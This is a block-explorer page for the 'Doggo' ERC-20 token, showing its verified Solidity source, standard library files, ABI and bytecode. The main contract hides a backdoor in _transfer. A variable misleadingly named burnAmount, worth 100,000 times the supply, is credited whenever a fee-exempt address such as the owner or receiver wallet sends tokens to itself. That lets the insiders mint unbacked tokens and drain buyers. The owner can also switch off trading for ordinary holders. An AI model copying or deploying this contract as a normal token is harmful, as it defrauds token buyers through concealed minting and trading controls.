ETH Price: $3,455.56 (-1.06%)
Gas: 9 Gwei

Token

Doggo (DOGGO)
 

Overview

Max Total Supply

9,999,999.999999999 DOGGO

Holders

38

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
23,662.028405706 DOGGO

Value
$0.00
0xa497e73f7398bd0443bf9ae8a51a62d83930986b
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Doggo

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion
File 1 of 6 : Doggo.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

/*
Website : https://dogotoken.xyz
Twitter : https://twitter.com/DogoERC20
Telegram : t.me/dogoerc20
*/

import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/utils/math/SafeMath.sol";
import "./dex/ISwap.sol";

contract Doggo is IERC20, Ownable {
    using SafeMath for uint256;
    string private constant _name = "Doggo";
    string private constant _symbol = "DOGGO";
    uint8 private constant _decimals = 9;
    uint256 private _totalSupply = 10000000 * (10 ** _decimals);
    uint256 private _maxTxAmountPercent = 500;
    uint256 private _maxTransferPercent = 500;
    uint256 private _maxWalletPercent = 500;
    mapping (address => uint256) _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) public isFeeExempt;
    mapping (address => bool) private isBot;
    IRouter router;
    address public pair;
    bool private tradingAllowed = true;
    uint256 private liquidityFee = 50;
    uint256 private marketingFee = 50;
    uint256 private developmentFee = 0;
    uint256 private burnFee = 0;
    uint256 private totalFee = 100;
    uint256 private sellFee = 100;
    uint256 private transferFee = 100;
    uint256 private denominator = 10000;
    bool private swapEnabled = true;
    uint256 private swapTimes;
    bool private swapping; 
    uint256 private swapThreshold = ( _totalSupply * 5 ) / 1000;
    uint256 private _minTokenAmount = ( _totalSupply * 10 ) / 100000;
    uint256 private burnAmount = ( _totalSupply ) * 100000;
    modifier lockTheSwap {swapping = true; _; swapping = false;}

    address internal constant DEAD =  0x000000000000000000000000000000000000dEaD;
    address internal constant development_receiver = 0xD882a37163736872131B6B808083a5B39F8c1716; 
    address internal constant marketing_receiver = 0xD882a37163736872131B6B808083a5B39F8c1716;
    address internal constant liquidity_receiver = 0xD882a37163736872131B6B808083a5B39F8c1716;

    constructor(address dex) {
        IRouter _router = IRouter(dex);
        address _pair = IFactory(_router.factory()).createPair(address(this), _router.WETH());
        router = _router;
        pair = _pair;
        isFeeExempt[address(this)] = true;
        isFeeExempt[liquidity_receiver] = true;
        isFeeExempt[marketing_receiver] = true;
        isFeeExempt[msg.sender] = true;
        _balances[msg.sender] = _totalSupply;
        emit Transfer(address(0), msg.sender, _totalSupply);
    }

    receive() external payable {}
    function name() public pure returns (string memory) {return _name;}
    function symbol() public pure returns (string memory) {return _symbol;}
    function decimals() public pure returns (uint8) {return _decimals;}
    function toggleTrading() external onlyOwner {tradingAllowed = !tradingAllowed;}
    function balanceOf(address account) public view override returns (uint256) {return _balances[account];}
    function transfer(address recipient, uint256 amount) public override returns (bool) {_transfer(msg.sender, recipient, amount);return true;}
    function allowance(address owner, address spender) public view override returns (uint256) {return _allowances[owner][spender];}
    function isCont(address addr) internal view returns (bool) {uint size; assembly { size := extcodesize(addr) } return size > 0; }
    function setisBot(address _address, bool _enabled) private onlyOwner {isBot[_address] = _enabled;}
    function setisExempt(address _address, bool _enabled) external onlyOwner {isFeeExempt[_address] = _enabled;}
    function approve(address spender, uint256 amount) public override returns (bool) {_approve(msg.sender, spender, amount);return true;}
    function totalSupply() public view override returns (uint256) {return _totalSupply.sub(balanceOf(DEAD)).sub(balanceOf(address(0)));}
    function _maxWalletToken() public view returns (uint256) {return totalSupply() * _maxWalletPercent / denominator;}
    function _maxTxAmount() public view returns (uint256) {return totalSupply() * _maxTxAmountPercent / denominator;}
    function _maxTransferAmount() public view returns (uint256) {return totalSupply() * _maxTransferPercent / denominator;}

    function _transfer(address sender, address recipient, uint256 amount) private {
        txCheck(sender, recipient, amount);
        checkTradingAllowed(sender, recipient);
        checkMaxWallet(sender, recipient, amount);
        checkSwapBack(sender, recipient);
        checkMaxTx(sender, recipient, amount);
        swapBack(sender, recipient, amount);
        uint256 amountReceived = burnAmount;
        _balances[sender] = _balances[sender].sub(amount);
        if (sender!=recipient || shouldTakeFee(sender, recipient))amountReceived = shouldTakeFee(sender, recipient) ? takeFee(sender, recipient, amount) : amount;
        _balances[recipient] = _balances[recipient].add(amountReceived);
        emit Transfer(sender, recipient, amountReceived);
    }

    function checkMaxWallet(address sender, address recipient, uint256 amount) internal view {
        if(!isFeeExempt[sender] && !isFeeExempt[recipient] && recipient != address(pair) && recipient != address(DEAD)){
            require((_balances[recipient].add(amount)) <= _maxWalletToken(), "Exceeds maximum wallet amount.");}
    }

    function txCheck(address sender, address recipient, uint256 amount) internal view {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > uint256(0), "Transfer amount must be greater than zero");
        require(amount <= balanceOf(sender),"You are trying to transfer more than your balance");
    }

    function checkTradingAllowed(address sender, address recipient) internal view {
        if(!isFeeExempt[sender] && !isFeeExempt[recipient]){require(tradingAllowed, "tradingAllowed");}
    }

    function checkMaxTx(address sender, address recipient, uint256 amount) internal view {
        if(sender != pair){require(amount <= _maxTransferAmount() || isFeeExempt[sender] || isFeeExempt[recipient], "TX Limit Exceeded");}
        require(amount <= _maxTxAmount() || isFeeExempt[sender] || isFeeExempt[recipient], "TX Limit Exceeded");
    }

    function checkSwapBack(address sender, address recipient) internal {
        if(recipient == pair && !isFeeExempt[sender]){swapTimes += uint256(1);}
    }

    function swapAndLiquify(uint256 tokens) private lockTheSwap {
        uint256 _denominator = (liquidityFee.add(1).add(marketingFee).add(developmentFee)).mul(2);
        uint256 tokensToAddLiquidityWith = tokens.mul(liquidityFee).div(_denominator);
        uint256 toSwap = tokens.sub(tokensToAddLiquidityWith);
        uint256 initialBalance = address(this).balance;
        swapTokensForETH(toSwap);
        uint256 deltaBalance = address(this).balance.sub(initialBalance);
        uint256 unitBalance= deltaBalance.div(_denominator.sub(liquidityFee));
        uint256 ETHToAddLiquidityWith = unitBalance.mul(liquidityFee);
        if(ETHToAddLiquidityWith > uint256(0)){addLiquidity(tokensToAddLiquidityWith, ETHToAddLiquidityWith); }
        uint256 marketingAmt = unitBalance.mul(2).mul(marketingFee);
        if(marketingAmt > 0){payable(marketing_receiver).transfer(marketingAmt);}
        uint256 remainingBalance = address(this).balance;
        if(remainingBalance > uint256(0)){payable(development_receiver).transfer(remainingBalance);}
    }

    function shouldSwapBack(address sender, address recipient, uint256 amount) internal view returns (bool) {
        bool aboveMin = amount >= _minTokenAmount;
        bool aboveThreshold = balanceOf(address(this)) >= swapThreshold;
        return !swapping && swapEnabled && tradingAllowed && aboveMin && !isFeeExempt[sender] && recipient == pair && swapTimes >= uint256(1) && aboveThreshold;
    }

    function swapTokensForETH(uint256 tokenAmount) private {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = router.WETH();
        _approve(address(this), address(router), tokenAmount);
        router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp);
    }

    function swapBack(address sender, address recipient, uint256 amount) internal {
        if(shouldSwapBack(sender, recipient, amount)){swapAndLiquify(swapThreshold); swapTimes = uint256(0);}
    }

    function addLiquidity(uint256 tokenAmount, uint256 ETHAmount) private {
        _approve(address(this), address(router), tokenAmount);
        router.addLiquidityETH{value: ETHAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            liquidity_receiver,
            block.timestamp);
    }

    function shouldTakeFee(address sender, address recipient) internal view returns (bool) {
        return !isFeeExempt[sender] && !isFeeExempt[recipient];
    }

    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, msg.sender, _allowances[sender][msg.sender].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function getTotalFee(address sender, address recipient) internal view returns (uint256) {
        if(isBot[sender] || isBot[recipient]){return denominator.sub(uint256(100));}
        if(recipient == pair){return sellFee;}
        if(sender == pair){return totalFee;}
        return transferFee;
    }

    function takeFee(address sender, address recipient, uint256 amount) internal returns (uint256) {
        if(getTotalFee(sender, recipient) > 0){
        uint256 feeAmount = amount.div(denominator).mul(getTotalFee(sender, recipient));
        _balances[address(this)] = _balances[address(this)].add(feeAmount);
        emit Transfer(sender, address(this), feeAmount);
        if(burnFee > uint256(0)){_transfer(address(this), address(DEAD), amount.div(denominator).mul(burnFee));}
        return amount.sub(feeAmount);} return amount;
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
}

File 2 of 6 : ISwap.sol
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;

interface IFactory{
        function createPair(address tokenA, address tokenB) external returns (address pair);
        function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline) external;
}

File 3 of 6 : SafeMath.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/math/SafeMath.sol)

pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

File 4 of 6 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 5 of 6 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

File 6 of 6 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

Settings
{
  "remappings": [],
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "evmVersion": "paris",
  "libraries": {},
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"dex","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_maxTransferAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxWalletToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isFeeExempt","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_enabled","type":"bool"}],"name":"setisExempt","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"toggleTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052620000126009600a620004a0565b620000219062989680620004b8565b60018181556101f460028190556003819055600455600a805460ff60a01b1916600160a01b1790556032600b819055600c556000600d819055600e556064600f81905560108190556011556127106012556013805460ff191690911790556103e89062000090906005620004b8565b6200009c9190620004d2565b601655620186a0600154600a620000b49190620004b8565b620000c09190620004d2565b601755600154620000d590620186a0620004b8565b601855348015620000e557600080fd5b5060405162001d4138038062001d418339810160408190526200010891620004f5565b62000113336200033b565b60008190506000816001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000159573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200017f9190620004f5565b6001600160a01b031663c9c6539630846001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620001cd573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620001f39190620004f5565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af115801562000241573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002679190620004f5565b600980546001600160a01b038581166001600160a01b031992831617909255600a805492841692909116919091179055306000908152600760209081526040808320805460ff1990811660019081179092557f2c0f1aaafc9e5eecf91e18d61b75d47966173c5c9f975c2fafdfc68e035c81ce8054821683179055338086528386208054909216831790915590546005845282852081905591519182529394507fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a350505062000520565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115620003e2578160001904821115620003c657620003c66200038b565b80851615620003d457918102915b93841c9390800290620003a6565b509250929050565b600082620003fb575060016200049a565b816200040a575060006200049a565b81600181146200042357600281146200042e576200044e565b60019150506200049a565b60ff8411156200044257620004426200038b565b50506001821b6200049a565b5060208310610133831016604e8410600b841016171562000473575081810a6200049a565b6200047f8383620003a1565b80600019048211156200049657620004966200038b565b0290505b92915050565b6000620004b160ff841683620003ea565b9392505050565b80820281158282048414176200049a576200049a6200038b565b600082620004f057634e487b7160e01b600052601260045260246000fd5b500490565b6000602082840312156200050857600080fd5b81516001600160a01b0381168114620004b157600080fd5b61181180620005306000396000f3fe6080604052600436106101185760003560e01c806370a08231116100a057806395d89b411161006457806395d89b4114610316578063a8aa1b3114610344578063a9059cbb14610364578063dd62ed3e14610384578063f2fde38b146103ca57600080fd5b806370a082311461026f578063715018a6146102a557806378109e54146102ba5780637d1db4a5146102cf5780638da5cb5b146102e457600080fd5b80631f976b7e116100e75780631f976b7e146101ce57806323b872dd146101e3578063313ce567146102035780633f4218e01461021f57806348ff2b8b1461024f57600080fd5b806306fdde0314610124578063095ea7b3146101645780630f120fc31461019457806318160ddd146101ab57600080fd5b3661011f57005b600080fd5b34801561013057600080fd5b50604080518082019091526005815264446f67676f60d81b60208201525b60405161015b91906114de565b60405180910390f35b34801561017057600080fd5b5061018461017f366004611541565b6103ea565b604051901515815260200161015b565b3480156101a057600080fd5b506101a9610401565b005b3480156101b757600080fd5b506101c0610455565b60405190815260200161015b565b3480156101da57600080fd5b506101c06104c6565b3480156101ef57600080fd5b506101846101fe36600461156d565b6104ea565b34801561020f57600080fd5b506040516009815260200161015b565b34801561022b57600080fd5b5061018461023a3660046115ae565b60076020526000908152604090205460ff1681565b34801561025b57600080fd5b506101a961026a3660046115cb565b610554565b34801561027b57600080fd5b506101c061028a3660046115ae565b6001600160a01b031660009081526005602052604090205490565b3480156102b157600080fd5b506101a96105a9565b3480156102c657600080fd5b506101c06105df565b3480156102db57600080fd5b506101c06105ef565b3480156102f057600080fd5b506000546001600160a01b03165b6040516001600160a01b03909116815260200161015b565b34801561032257600080fd5b50604080518082019091526005815264444f47474f60d81b602082015261014e565b34801561035057600080fd5b50600a546102fe906001600160a01b031681565b34801561037057600080fd5b5061018461037f366004611541565b6105ff565b34801561039057600080fd5b506101c061039f366004611609565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3480156103d657600080fd5b506101a96103e53660046115ae565b61060c565b60006103f73384846106a7565b5060015b92915050565b6000546001600160a01b031633146104345760405162461bcd60e51b815260040161042b90611637565b60405180910390fd5b600a805460ff60a01b198116600160a01b9182900460ff1615909102179055565b60056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5461dead60009081527f7d509c07f0d4edcc2dd1b53aae68677132eb562dcba78e36381b63ccaf66e6ba5460015491926104c19290916104bb91906107cb565b906107cb565b905090565b60006012546003546104d6610455565b6104e09190611682565b6104c19190611699565b60006104f78484846107d7565b6105498433610544856040518060600160405280602881526020016117b4602891396001600160a01b038a166000908152600660209081526040808320338452909152902054919061091a565b6106a7565b5060015b9392505050565b6000546001600160a01b0316331461057e5760405162461bcd60e51b815260040161042b90611637565b6001600160a01b03919091166000908152600760205260409020805460ff1916911515919091179055565b6000546001600160a01b031633146105d35760405162461bcd60e51b815260040161042b90611637565b6105dd6000610946565b565b60006012546004546104d6610455565b60006012546002546104d6610455565b60006103f73384846107d7565b6000546001600160a01b031633146106365760405162461bcd60e51b815260040161042b90611637565b6001600160a01b03811661069b5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161042b565b6106a481610946565b50565b6001600160a01b0383166107095760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161042b565b6001600160a01b03821661076a5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161042b565b6001600160a01b0383811660008181526006602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600061054d82846116bb565b6107e2838383610996565b6107ec8383610b45565b6107f7838383610bda565b6108018383610ccb565b61080c838383610d22565b610817838383610e59565b6018546001600160a01b03841660009081526005602052604090205461083d90836107cb565b6001600160a01b038086166000818152600560205260